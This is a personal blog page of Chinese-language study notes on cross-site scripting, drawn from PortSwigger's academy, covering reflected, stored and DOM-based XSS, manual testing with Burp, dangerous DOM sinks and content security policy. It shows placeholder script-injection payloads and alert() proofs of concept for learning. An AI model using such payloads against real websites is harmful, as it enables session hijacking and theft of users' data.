<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <meta name="baidu-site-verification" content="code-nXJP22I4Cn">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"zhangyijian.cn","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":"mac","style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="男儿立志出乡关 , 学不成名誓不还 .   hexo似乎不能渲染我瞎写的attribute reference: https:&#x2F;&#x2F;portswigger.net&#x2F;web-security&#x2F;cross-site-scripting">
<meta property="og:type" content="article">
<meta property="og:title" content="跨站脚本攻击">
<meta property="og:url" content="https://zhangyijian.cn/Notes/Cross-site%20scripting/index.html">
<meta property="og:site_name" content="人生边上">
<meta property="og:description" content="男儿立志出乡关 , 学不成名誓不还 .   hexo似乎不能渲染我瞎写的attribute reference: https:&#x2F;&#x2F;portswigger.net&#x2F;web-security&#x2F;cross-site-scripting">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403262143196.png">
<meta property="og:image" content="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403270935328.png">
<meta property="og:image" content="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403270938229.png">
<meta property="og:image" content="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403271057194.png">
<meta property="og:image" content="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403271102460.png">
<meta property="og:image" content="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403271224449.png">
<meta property="article:published_time" content="2024-03-25T16:00:00.000Z">
<meta property="article:modified_time" content="2024-03-28T12:10:03.044Z">
<meta property="article:author" content="Yijian">
<meta property="article:tag" content="知识&#x2F;cybersecurity">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="XSS">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403262143196.png">

<link rel="canonical" href="https://zhangyijian.cn/Notes/Cross-site%20scripting/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>跨站脚本攻击 | 人生边上</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">人生边上</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://zhangyijian.cn/Notes/Cross-site%20scripting/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Yijian">
      <meta itemprop="description" content="Just for fun :D">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="人生边上">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          跨站脚本攻击
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-03-26 00:00:00" itemprop="dateCreated datePublished" datetime="2024-03-26T00:00:00+08:00">2024-03-26</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-03-28 20:10:03" itemprop="dateModified" datetime="2024-03-28T20:10:03+08:00">2024-03-28</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>男儿立志出乡关 , 学不成名誓不还 .  </p>
<p>hexo似乎不能渲染我瞎写的attribute</p>
<p>reference: <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting">https://portswigger.net/web-security/cross-site-scripting</a></p>
<span id="more"></span>
<h1 id="Cross-site-scripting"><a href="#Cross-site-scripting" class="headerlink" title="Cross-site scripting"></a>Cross-site scripting</h1><h2 id="What-is-cross-site-scripting-XSS"><a href="#What-is-cross-site-scripting-XSS" class="headerlink" title="What is cross-site scripting (XSS)?"></a>What is cross-site scripting (XSS)?</h2><blockquote>
<p> allows an attacker to compromise the interactions that users have with a vulnerable application<br> <br>allows an attacker to circumvent the same origin policy</p>
<p>masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user’s data</p>
</blockquote>
<h2 id="How-does-XSS-work"><a href="#How-does-XSS-work" class="headerlink" title="How does XSS work?"></a>How does XSS work?</h2><blockquote>
<p>returns malicious JavaScript to users</p>
</blockquote>
<h2 id="XSS-proof-of-concept"><a href="#XSS-proof-of-concept" class="headerlink" title="XSS proof of concept"></a>XSS proof of concept</h2><ul>
<li><code>alert()</code> short , harmless , hard to miss<blockquote>
<p>Chrome. From version 92 onward (July 20th, 2021), cross-origin iframes are prevented from calling <code>alert()</code></p>
</blockquote>
</li>
<li><code>print()</code> <a target="_blank" rel="noopener" href="https://portswigger.net/research/alert-is-dead-long-live-print">alert() is dead, long live print()</a></li>
</ul>
<h2 id="What-are-the-types-of-XSS-attacks"><a href="#What-are-the-types-of-XSS-attacks" class="headerlink" title="What are the types of XSS attacks?"></a>What are the types of XSS attacks?</h2><ul>
<li><a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting#reflected-cross-site-scripting">Reflected XSS</a>, where the malicious script comes from the current HTTP request.</li>
<li><a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting#stored-cross-site-scripting">Stored XSS</a>, where the malicious script comes from the website’s database.</li>
<li><a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting#dom-based-cross-site-scripting">DOM-based XSS</a>, where the vulnerability exists in client-side code rather than server-side code.</li>
</ul>
<h2 id="Reflected-cross-site-scripting"><a href="#Reflected-cross-site-scripting" class="headerlink" title="Reflected cross-site scripting"></a><a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting/reflected">Reflected cross-site scripting</a></h2><blockquote>
<p>simplest variety of cross-site scripting </p>
<p>It arises when an application receives data in an HTTP request and <strong>includes that data within the immediate response</strong> in an unsafe way.<br>simple example :</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">https://insecure-website.com/status?message=All+is+well.</span><br><span class="line">&lt;p&gt;Status: All is well.&lt;/p&gt;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>construct an attack:</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">https://insecure-website.com/status?message=&lt;script&gt;/*+Bad+stuff+here...+*/&lt;/script&gt;</span><br><span class="line">&lt;p&gt;Status: &lt;script&gt;/* Bad stuff here... */&lt;/script&gt;&lt;/p&gt;</span><br></pre></td></tr></table></figure>
<h1 id="Reflected-XSS"><a href="#Reflected-XSS" class="headerlink" title="Reflected XSS"></a>Reflected XSS</h1><h2 id="What-is-reflected-cross-site-scripting"><a href="#What-is-reflected-cross-site-scripting" class="headerlink" title="What is reflected cross-site scripting?"></a>What is reflected cross-site scripting?</h2><blockquote>
<p>Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.</p>
</blockquote>
<p>有个参数:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://insecure-website.com/search?term=gift</span><br></pre></td></tr></table></figure>
<p>“includes that data within the immediate response in an unsafe way”</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">p</span>&gt;</span>You searched for: gift<span class="tag">&lt;/<span class="name">p</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>构建payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://insecure-website.com/search?term=&lt;script&gt;/*+Bad+stuff+here...+*/&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p>最终在受害者浏览器中:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;p&gt;You searched for: &lt;script&gt;/* Bad stuff here... */&lt;/script&gt;&lt;/p&gt;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>这个lab我还做过了, 啥时候做的.</p>
</blockquote>
<h2 id="Impact-of-reflected-XSS-attacks"><a href="#Impact-of-reflected-XSS-attacks" class="headerlink" title="Impact of reflected XSS attacks"></a>Impact of reflected XSS attacks</h2><ul>
<li>Perform any action within the application that the user can perform.</li>
<li>View any information that the user is able to view.</li>
<li>Modify any information that the user is able to modify.</li>
<li>Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.<br>也有多种方法”induce a victim user to make a request that they control, to deliver a reflected XSS attack” :</li>
</ul>
<ul>
<li>placing links on a website controlled by the attacker , or on another website that allows content to be generated</li>
<li>sending a link in an email, tweet or other message<blockquote>
<p>The need for an external delivery mechanism for the attack means that the impact of reflected XSS is generally less severe than <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting/stored">stored XSS</a></p>
</blockquote>
</li>
</ul>
<h2 id="Reflected-XSS-in-different-contexts"><a href="#Reflected-XSS-in-different-contexts" class="headerlink" title="Reflected XSS in different contexts"></a>Reflected XSS in different contexts</h2><blockquote>
<p> The <strong>location</strong> of the reflected data within the application’s response determines what type of payload is required to exploit it and might also affect the impact of the vulnerability.</p>
</blockquote>
<p>^db97e0</p>
<p>同样的, validation or other processing on the submitted data 也会有影响.</p>
<h2 id="How-to-find-and-test-for-reflected-XSS-vulnerabilities"><a href="#How-to-find-and-test-for-reflected-XSS-vulnerabilities" class="headerlink" title="How to find and test for reflected XSS vulnerabilities"></a>How to find and test for reflected XSS vulnerabilities</h2><p>推荐了Burp Suite’s <a target="_blank" rel="noopener" href="https://portswigger.net/burp/vulnerability-scanner">web vulnerability scanner</a><br>手动地去检测遵循以下步骤:</p>
<ul>
<li><strong>Test every entry point.</strong><ol>
<li>parameters or other data within the URL query string and message body</li>
<li>the URL file path</li>
<li>HTTP headers<blockquote>
<p>although XSS-like behavior that can only be triggered via certain HTTP headers may not be exploitable <strong>in practice</strong></p>
</blockquote>
</li>
</ol>
</li>
<li><strong>Submit random alphanumeric values.</strong><ol>
<li>The value should be designed to survive most input validation<ol>
<li>short and contain only alphanumeric characters<blockquote>
<p> But it needs to be long enough to make accidental matches within the response highly unlikely.? 我没看懂这个”make accidental matches within the response” 噢 是说使出现意外匹配的概率小.</p>
</blockquote>
</li>
</ol>
</li>
<li>A random alphanumeric value of around 8 characters is normally ideal.</li>
<li>可以用<a target="_blank" rel="noopener" href="https://portswigger.net/burp/documentation/desktop/tools/intruder/payloads/types#numbers">Burp Intruder’s number payloads</a> , 同时使用Burp Intruder’s <a target="_blank" rel="noopener" href="https://portswigger.net/burp/documentation/desktop/tools/intruder/configure-attack/settings#grep-payloads">grep payloads settings</a> to automatically flag responses that contain the submitted value.</li>
</ol>
</li>
<li><strong>Determine the reflection context</strong><blockquote>
<p>我理解的就是标签闭合的问题.</p>
</blockquote>
</li>
<li><strong>Test a candidate payload</strong><ol>
<li>就是去测试是否payload是否能工作</li>
<li>技巧:<ol>
<li>An efficient way to work is to leave the original random value in the request and place the candidate XSS payload before or after it.</li>
<li>Then set the random value as the search term in Burp Repeater’s response view.</li>
<li>帮助快速定位</li>
</ol>
</li>
</ol>
</li>
<li><strong>Test alternative payloads.</strong><blockquote>
<p>上一步的payload不成功(被修改了 , block了) , 就需要基于context of the reflection and the type of input validation来构造 alternative payloads and techniques</p>
</blockquote>
</li>
<li><strong>Test the attack in a browser.</strong> <ol>
<li>transfer the attack to a real browser (by pasting the URL into the address bar, or by modifying the request in <a target="_blank" rel="noopener" href="https://portswigger.net/burp/documentation/desktop/tools/proxy/intercept-messages">Burp Proxy’s intercept view</a></li>
<li>see if the injected JavaScript is indeed executed</li>
<li>最好是执行些明显的<code>alert(document.domain)</code></li>
</ol>
</li>
</ul>
<h2 id="Common-questions-about-reflected-cross-site-scripting"><a href="#Common-questions-about-reflected-cross-site-scripting" class="headerlink" title="Common questions about reflected cross-site scripting"></a>Common questions about reflected cross-site scripting</h2><p><strong>What is the difference between reflected XSS and stored XSS?</strong><br>With stored XSS, the application instead <strong>stores</strong> the input and embeds it into a <strong>later</strong> response in an unsafe way.</p>
<p><strong>What is the difference between reflected XSS and self-XSS?</strong><br>Self-XSS:</p>
<ol>
<li>involves similar application behavior to regular reflected XSS</li>
<li> it cannot be triggered in normal ways via a crafted URL or a cross-domain request</li>
<li>only triggered if the victim themselves submits the XSS payload from their browser ( ? 反射型不也是受害者自己浏览器提交的吗?)</li>
<li> normally involves socially engineering the victim to paste some attacker-supplied input into their browser(?)</li>
<li> it is normally considered to be a lame, low-impact issue.</li>
</ol>
<h2 id="Stored-cross-site-scripting"><a href="#Stored-cross-site-scripting" class="headerlink" title="Stored cross-site scripting"></a><a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting/stored">Stored cross-site scripting</a></h2><blockquote>
<p><a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting/stored">Stored XSS</a> (also known as persistent or second-order XSS) arises when an application receives data from an untrusted source and includes that data within its <strong>later</strong> HTTP responses in an unsafe way. 与反射型的显著区别.</p>
</blockquote>
<p>常见的例子:</p>
<ol>
<li>数据通过HTTP requests提交:<ul>
<li>comments on a blog post</li>
<li>user nicknames in a chat room</li>
<li>contact details on a customer order</li>
</ul>
</li>
<li>from other untrusted sources:<ul>
<li>a webmail application displaying messages received over SMTP</li>
<li>a marketing application displaying social media posts</li>
<li>a network monitoring application displaying packet data from network traffic<blockquote>
<p>这些真能执行XSS吗?</p>
</blockquote>
</li>
</ul>
</li>
</ol>
<p>举例: 网站允许用户提交信息:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;p&gt;Hello, this is my message!&lt;/p&gt;</span><br></pre></td></tr></table></figure>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">p</span>&gt;</span><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"><span class="comment">/* Bad stuff here... */</span></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span><span class="tag">&lt;/<span class="name">p</span>&gt;</span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>这里还提供了一个<a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet">Cross-site scripting cheat sheet</a> 大致一看 ,很有用 , “contains many vectors that can help you bypass WAFs and filters.”</p>
</blockquote>
<h1 id="Stored-XSS"><a href="#Stored-XSS" class="headerlink" title="Stored XSS"></a>Stored XSS</h1><h2 id="What-is-stored-cross-site-scripting"><a href="#What-is-stored-cross-site-scripting" class="headerlink" title="What is stored cross-site scripting?"></a>What is stored cross-site scripting?</h2><blockquote>
<p>Stored cross-site scripting (also known as second-order or persistent XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way.</p>
</blockquote>
<p>例子: 发表评论</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/post/comment</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>vulnerable-website.com</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>100</span><br><span class="line"></span><br><span class="line"><span class="language-dts">postId=<span class="number">3</span><span class="variable">&amp;comment</span>=This+post+was+extremely+helpful.<span class="variable">&amp;name</span>=Carlos+Montoya<span class="variable">&amp;email</span>=carlos%<span class="number">40</span>normal-user.net</span></span><br></pre></td></tr></table></figure>
<p>如果application不对数据做任何处理 , 就可以构造malicious comment</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"><span class="comment">/* Bad stuff here... */</span></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span>`</span><br></pre></td></tr></table></figure>
<p>经过URL编码</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">comment=%3Cscript%3E%2F*%2BBad%2Bstuff%2Bhere...%2B*%2F%3C%2Fscript%3E</span><br></pre></td></tr></table></figure>
<p>最终页面:</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;p&gt;&lt;script&gt;/* Bad stuff here... */&lt;/script&gt;&lt;/p&gt;</span><br></pre></td></tr></table></figure>
<h4 id="Lab-Stored-XSS-into-HTML-context-with-nothing-encoded"><a href="#Lab-Stored-XSS-into-HTML-context-with-nothing-encoded" class="headerlink" title="Lab: Stored XSS into HTML context with nothing encoded"></a>Lab: <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting/stored">Stored XSS</a> into HTML context with nothing encoded</h4><p>直接写HTML标签即可, burp 都不用打开. </p>
<h2 id="Impact-of-stored-XSS-attacks"><a href="#Impact-of-stored-XSS-attacks" class="headerlink" title="Impact of stored XSS attacks"></a>Impact of stored XSS attacks</h2><blockquote>
<p> typically fully compromise that user</p>
</blockquote>
<blockquote>
<p>the key difference between reflected and stored XSS is that a stored XSS vulnerability enables attacks that are <strong>self-contained</strong> within the application itself.</p>
</blockquote>
<p>这里还提到一个 , XSS 漏洞的受害者是否登陆了的问题 . 如果用户没有登陆 , 显然攻击者所造成的危害较小 . 这里还提到说反射型XSS , 攻击是偶然的, 用户不一定是登陆的 , 如果没登陆就不会造成损害 . 相对的 , 如果是存储型XSS , 用户”encounter the exploit” 就一定会是登陆了的.(这里我个人持保留意见).</p>
<h2 id="Stored-XSS-in-different-contexts"><a href="#Stored-XSS-in-different-contexts" class="headerlink" title="Stored XSS in different contexts"></a>Stored XSS in different contexts</h2><p>这里跟反射型也是同样的[[#^db97e0]] , 它相应位置不同 , validation or other processing on the data不同 , payload也需要做出相应的改变 . </p>
<p>这里与[[#Reflected XSS in different contexts]]是一个道理. </p>
<h2 id="How-to-find-and-test-for-stored-XSS-vulnerabilities"><a href="#How-to-find-and-test-for-stored-XSS-vulnerabilities" class="headerlink" title="How to find and test for stored XSS vulnerabilities"></a>How to find and test for stored XSS vulnerabilities</h2><p>这里也是推荐了Burp Suite’s <a target="_blank" rel="noopener" href="https://portswigger.net/burp/vulnerability-scanner">web vulnerability scanner</a></p>
<blockquote>
<p>这里也是提到了个”Testing for stored XSS vulnerabilities manually can be challenging.”</p>
<p>You need to test all relevant “entry points” via which attacker-controllable data can enter the application’s processing, and all “exit points” at which that data might appear in the application’s responses.</p>
</blockquote>
<ol>
<li>Entry points into the application’s processing include:<ul>
<li>Parameters or other data within the URL query string and message body.</li>
<li>The URL file path.</li>
<li>HTTP request headers that might not be exploitable in relation to reflected XSS.</li>
<li>Any out-of-band routes via which an attacker can deliver data into the application.这就得视具体情况而定了.<ol>
<li>a webmail application will process data received in emails</li>
<li>an application displaying a Twitter feed might process data contained in third-party tweets</li>
<li>a news aggregator will include data originating on other web sites<br>exit points for stored XSS attacks are all possible HTTP responses that are returned to any kind of application user in any situation.<blockquote>
<p>所有可以利用的都可以利用.  emmm , 写出来才发现这句话特别像一句话.</p>
</blockquote>
</li>
</ol>
</li>
</ul>
</li>
</ol>
<p>testing for stored XSS vulnerabilities:</p>
<ol>
<li>locate the links between entry and exit points<br> 存在一定难度 , 因为:<ol>
<li>Data submitted to any entry point could in principle be emitted from any exit point. 比方说上述的用户提交的name 不是一定就会显示的.</li>
<li>Data that is currently stored by the application is often vulnerable to being overwritten due to other actions performed within the application.</li>
</ol>
</li>
<li>submitting a specific value into the entry point, navigating directly to the exit point, and determining whether the value appears there.<blockquote>
<p>感觉上就是去试着来 , 但是这种方法 ,application 页面一多了就不大行. </p>
</blockquote>
</li>
<li>Instead, a more realistic approach is to work systematically through the data entry points, submitting a specific value into each one, and monitoring the application’s responses to detect cases where the submitted value appears.<blockquote>
<p>当然也要有所针对性 , 比方说上述的评论等功能. </p>
</blockquote>
</li>
<li>When the submitted value is observed in a response, you need to determine whether the data is indeed being stored across different requests, as opposed to being simply reflected in the immediate response.<br>之后的test也类似反射型[[#How to find and test for reflected XSS vulnerabilities]]</li>
</ol>
<h2 id="DOM-based-cross-site-scripting"><a href="#DOM-based-cross-site-scripting" class="headerlink" title="DOM-based cross-site scripting"></a>DOM-based cross-site scripting</h2><blockquote>
<p>DOM-based XSS (also known as <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting/dom-based">DOM XSS</a>) arises when an application contains some <strong>client-side</strong> JavaScript that processes data from an untrusted source in an unsafe way, usually by writing the data back to the DOM.</p>
</blockquote>
<p>例子: an application uses some JavaScript to read the value from an input field and write that value to an element within the HTML</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> search = <span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">&#x27;search&#x27;</span>).<span class="property">value</span>;</span><br><span class="line"><span class="keyword">var</span> results = <span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">&#x27;results&#x27;</span>);</span><br><span class="line">results.<span class="property">innerHTML</span> = <span class="string">&#x27;You searched for: &#x27;</span> + search;</span><br></pre></td></tr></table></figure>
<p>可以构造:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title class_">You</span> searched <span class="attr">for</span>: <span class="language-xml"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">1</span> <span class="attr">onerror</span>=<span class="string">&#x27;/* Bad stuff here... */&#x27;</span>&gt;</span></span></span><br></pre></td></tr></table></figure>
<h1 id="DOM-based-XSS"><a href="#DOM-based-XSS" class="headerlink" title="DOM-based XSS"></a>DOM-based <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting">XSS</a></h1><h2 id="What-is-DOM-based-cross-site-scripting"><a href="#What-is-DOM-based-cross-site-scripting" class="headerlink" title="What is DOM-based cross-site scripting?"></a>What is DOM-based cross-site scripting?</h2><blockquote>
<p>DOM-based XSS vulnerabilities usually arise when JavaScript takes data from an attacker-controllable source, such as the URL, and passes it to a sink that supports dynamic code execution, such as <code>eval()</code> or <code>innerHTML</code>.</p>
</blockquote>
<blockquote>
<p>The most common source for DOM XSS is the URL, which is typically accessed with the <code>window.location</code> object.</p>
</blockquote>
<p>我对这个DOM很是陌生啊, 一点不了解.The Document Object Model (DOM) is a web browser’s hierarchical representation of the elements on the page.<br>这里直接跳到最后了 </p>
<blockquote>
<p>这下真是, 前面的区域以后再探索把.</p>
</blockquote>
<h2 id="Which-sinks-can-lead-to-DOM-XSS-vulnerabilities"><a href="#Which-sinks-can-lead-to-DOM-XSS-vulnerabilities" class="headerlink" title="Which sinks can lead to DOM-XSS vulnerabilities?"></a>Which sinks can lead to DOM-XSS vulnerabilities?</h2><p>The following are some of the main sinks that can lead to DOM-XSS vulnerabilities:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">document.write()</span><br><span class="line">document.writeln()</span><br><span class="line">document.domain</span><br><span class="line">element.innerHTML</span><br><span class="line">element.outerHTML</span><br><span class="line">element.insertAdjacentHTML</span><br><span class="line">element.onevent</span><br></pre></td></tr></table></figure>
<h2 id="What-can-XSS-be-used-for"><a href="#What-can-XSS-be-used-for" class="headerlink" title="What can XSS be used for?"></a>What can XSS be used for?</h2><ul>
<li>Impersonate or masquerade as the victim user.伪装成目标</li>
<li>Carry out any action that the user is able to perform.</li>
<li>Read any data that the user is able to access.</li>
<li>Capture the user’s login credentials.</li>
<li>Perform virtual defacement of the web site.</li>
<li>Inject trojan functionality into the web site.</li>
</ul>
<h2 id="Impact-of-XSS-vulnerabilities"><a href="#Impact-of-XSS-vulnerabilities" class="headerlink" title="Impact of XSS vulnerabilities"></a>Impact of XSS vulnerabilities</h2><p>generally depends on the nature of the application, its functionality and data, and the status of the compromised user.</p>
<p>例子: </p>
<ul>
<li>静态应用 , 用户都是匿名的, 所有信息都是公开的 , 影响通常就很小</li>
<li>有敏感信息的应用, 像银行 ,邮箱 , 医疗记录 , 就会带来很严重的影响</li>
<li>受害用户对应用有高级权限 , 就会很致命.</li>
</ul>
<h2 id="How-to-find-and-test-for-XSS-vulnerabilities"><a href="#How-to-find-and-test-for-XSS-vulnerabilities" class="headerlink" title="How to find and test for XSS vulnerabilities"></a>How to find and test for XSS vulnerabilities</h2><p>这里他又推荐了一遍Burp Suite’s web vulnerability scanner</p>
<p>手工地测试XSS漏洞 就跟前边写的一样, 这里还概括了怎样手工测试DOM-based XSS</p>
<blockquote>
<p>placing some simple unique input in the parameter, using the browser’s developer tools to search the DOM for this input, and testing each location to determine whether it is exploitable.</p>
</blockquote>
<blockquote>
<p>但是其它类型的DOM-based XSS就得审计源码了</p>
</blockquote>
<blockquote>
<p>To find DOM-based vulnerabilities in non-URL-based input (such as <code>document.cookie</code>) or non-HTML-based sinks (like <code>setTimeout</code>), there is no substitute for reviewing JavaScript code</p>
</blockquote>
<h2 id="Content-security-policy"><a href="#Content-security-policy" class="headerlink" title="Content security policy"></a>Content security policy</h2><p>Content security policy (CSP) is a browser mechanism that aims to mitigate the impact of cross-site scripting and some other vulnerabilities.</p>
<p>不过他也提到, 通常情况下 , CSP是可以被绕过的.</p>
<h1 id="Content-security-policy-1"><a href="#Content-security-policy-1" class="headerlink" title="Content security policy"></a>Content security policy</h1><h2 id="What-is-CSP-content-security-policy"><a href="#What-is-CSP-content-security-policy" class="headerlink" title="What is CSP (content security policy)?"></a>What is CSP (content security policy)?</h2><p>It works by restricting the resources (such as scripts and images) that a page can load and restricting whether a page can be framed by other pages.</p>
